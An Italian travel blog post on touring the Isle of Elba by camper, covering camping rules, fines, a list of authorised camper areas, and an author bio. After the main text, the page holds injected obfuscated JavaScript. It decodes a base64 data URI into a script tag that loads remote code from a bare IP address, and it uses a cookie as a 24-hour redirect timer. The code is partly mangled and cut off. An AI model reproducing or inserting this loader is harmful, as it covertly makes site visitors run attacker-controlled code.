Image

Elba in camper: la tua casa sul mare più bello che c’è!

Ecco tutti i consigli per un viaggio sull’Isola d’Elba in camper:

Per gli amanti delle case su ruota sarà bello sapere che all’Isola d’Elba i camper non solo sono ben accetti, ma Elba è una delle località meglio organizzate per ricevere questo tipo di turismo. Numerosi campeggi mimetizzati dalle ombrose e fresche pinete e dislocati nei pressi delle spiagge più belle dell’isola ospitano infatti aree attrezzate per chi decide di venire all’Elba in camper. Poiché gran parte del territorio elbano è protetto dalla riserva del Parco Nazionale dell’Arcipelago Toscano, è facilmente intuibile quanto il campeggio libero sia vietato: severe norme e regolamenti sanzionano qualunque tipo di infrazione ed è per questo che è consigliabile vivamente attenersi al rispetto delle aree adibite per evitare multe salate. Un piccolo chiarimento necessario: quando si parla di sanzioni per i camper all’Isola d’Elba in aree non autorizzate si intende anche solo poggiare il mezzo sui piedini di sostegno o predisporre una zona pic nic di fronte ad esso.

Tra le località in cui ci potrete trovare ospitalità e dove potrete sostare, rifornirvi e compiere le operazioni di scarico, segnaliamo l’Area Camper La Perla che si trova nel Golfo di Procchio in località Campo all’Aia; l’Agricampeggio Bioelba a Ferrato, vicino Capoliveri; l’area di sosta Colombi Stefania; l’Agricampeggio Orti di Mare a Lacona; l’area di Boccheto nei pressi di Porto Azzurro ed infine l’area di Cavo, località San Bennato.

Venire all’Isola d’Elba in camper vi consentirà di soggiornare nelle località più belle senza spese eccessive, avere tutto a portata di mano senza la fatica di disfare i bagagli, cucinare voi stessi senza dover andare necessariamente al ristorante, dormire tutti insieme sia che siate amici o una famiglia e vivere un’esperienza in armonia con la natura, ma con le comodità di una casa vera e propria. In più avrete tutto vicino e grazie agli autobus non dovrete neanche spostarvi per girare l’isola. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento